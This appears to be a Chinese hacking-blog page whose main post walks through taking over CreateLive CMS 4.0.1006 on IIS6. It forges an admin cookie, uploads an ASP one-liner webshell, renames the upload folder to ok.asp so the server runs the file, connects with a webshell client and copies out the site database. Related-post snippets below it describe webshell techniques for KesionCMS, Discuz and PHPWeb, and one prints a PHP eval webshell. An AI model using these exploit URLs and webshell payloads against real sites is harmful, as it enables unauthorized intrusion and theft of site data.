CreateLiveCMSV4.0 漏洞,无需后台Get shell

Title:CreateLiveCMSV4.0 漏洞,无需后台Get shell --2012-03-06 17:28

标题:CreateLive CMS Version 4.0.1006 漏洞,无需后台 Get shell

必须环境:IIS6,上传目录可执行脚本

CreateLive CMS Version 4.0.1006 是个非常古老滴CMS了。

-----------------------------------------------------------------------------------------------------------------------------------------------

在弄个非常Old的站的时候发现是CreateLive CMS Version 4.0.1006版本。

纠结地找洞时候发现了一点漏洞。

注册个用户,登录。

修改cookie:UserGroupID=1&Password=798fb0743e519ec0&UserName=admin&UserID=1

保存cookie,打开

http://XXX.XXX.XXX.XXX/dlugis/user/upload.asp?action=F&id=3&type=0

id的值按需求改变.

上传一个copy的ASP一句话

查看文件目录

http://xxx.xxx.xxx.xxx/dlugis/Admin/Admin_Files.asp?action=Main&FileType=select&ChannelID=2&ThisDir=../Photo/2012-3

更改文件夹名

http://XXX.XXX.XXX.XXX/dlugis/Admin/Admin_Files.asp?action=Rname&FileType=select&ChannelID=3&FolderId=2012-3&NewName=ok.asp

查看下成功没有

菜刀连接

http://XXX.XXX.XXX.XXX/dlugis/Admin/Admin_Files.asp?action=Rname&FileType=select&ChannelID=3&FileId=../../Data/%23Cl_Count.mdb&NewName=ok

把别的目录的数据库文件复制到当前目录,文件名为ok.mdb

http://XXX.XXX.XXX.XXX/dlugis/Admin/Admin_Files.asp?action=Main&FileType=select&ChannelID=2&ThisDir=../../../

浏览目录

时间: 2024-11-05 06:27:16

CreateLiveCMSV4.0 漏洞,无需后台Get shell的相关文章

KesionCMS V6.5后台拿SHELL方法

Title:KesionCMS V6.5后台拿SHELL方法  --2011-03-29 00:21 最近弄一个站点,是KesionCMS V6.5的WEB系统,试了下后台拿webshell方法,记下来. 1. 新建x.asp用户再结合IIS的文件夹解析漏洞,是可以拿到SHELL的,前提是没有禁止.asp目录的访问,我弄的目标站,不允许访问.asp这样的目录下面的文件的. 2. 后台SQL执行导出webshell 理论上是可以的,我在本地可以导出ok.asp;o.xls这样的文件的.但是TXT文

discuz6.1两种方法后台拿shell

discuz6.1两种方法后台拿shell好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下1:http://127.0.0.1/discuz/admincp.php?action=runwizard&frames=yesadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell<?php eval($_POST[cmd]);?>后台webshell地址

利用SQL注入漏洞登录后台的实现方法

利用SQL注入漏洞登录后台的实现方法 作者: 字体:[增加 减小] 类型:转载 时间:2012-01-12我要评论 工作需要,得好好补习下关于WEB安全方面的相关知识,故撰此文,权当总结,别无它意.读这篇文章,我假设读者有过写SQL语句的经历,或者能看得懂SQL语句 早在02年,国外关于SQL注入漏洞的技术文章已经很多,而国内在05年左右才开始的.  如今,谈SQL注入漏洞是否已是明日黄花,国内大大小小的网站都已经补上漏洞.但,百密必有一疏,入侵是偶然的,但安全绝对不是必然的.  前些天,网上传

关于phpweb后台拿shell简单方法。

首先登录后台admin.php 登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地址. 代码文件如下: <form name="uploadForm" method="post" enctype="multipart/form-data" action="http://www.xxx.com/kedit/upload_cgi/upload.php"

蚁剑xss漏洞,获取***者shell

今日在github上看到蚁剑暴露了一个xss漏洞,自己也经常使用蚁剑.同时在freebuf上也有一篇文章,关于蚁剑漏洞的.闲着没事测试了一波. 一.漏洞成因 蚁剑shell远程连接失败时,蚁剑会返回错误信息,但因为使用的是html解析,导致xss漏洞. 用过蚁剑的童靴都清楚,当我们远程连接写好的webshell的时候,有时候可能因为shell书写错误或者链接填写不当的时候,会出现大堆的错误代码. 该信息并没有进行 XSS 保护,因此能够利用 js 调用 perl 便可反弹***者的shell 很

安全研究员披露 Chrome 的 Magellan 2.0 漏洞

腾讯安全研究员<a href="https://blade.tencent.com/magellan2/index.html">披露</a>了 Google Chrome 的新 Magellan 2.0 漏洞.研究人员共发现了 5 个漏洞,位于 SQLite 中,统称为 Magellan 2.0,这组漏洞允许***者在 Google Chrome 内远程运行恶意代码.Google 与 SQLite 官方已确认并修复了漏洞. 如果用户使用 2019 年 12 月

vue2.0 + element ui 后台管理系统

vue2.0 和 elementui  搭建的一个后台管理系统 概述: 这是一个用vuejs2.0和element搭建的后台管理界面. 技术栈: vue2.0:渐进式JavaScript框架,易用.灵活.高效,似乎任何规模的应用都适用. element ui:基于vue2.0的ui组件库. vue-router:一般单页面应用spa都要用到的前端路由. vuex:Vuex 是一个专为 Vue.js 应用程序开发的状态管理模式. webpack + es6/7 + less mock.js : 相

Zabbix sql注入漏洞脚本执行反弹shell

exp检测是否存在SQL注入漏洞[email protected]:~# python zabbix.py http://ip:9090/+------------------------------------------------------------+ Python Zabbix<3.0.4 SQL注入 Exploitsuccess+------------------------------------------------------------+Zabbix 存在SQL注入漏洞

ThinkCMF框架任意内容包含漏洞分析复现(写入shell+文件包哈)

ThinkCMF框架任意内容包含漏洞分析复现 0x00 简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建.ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展.每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作.在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本. 0x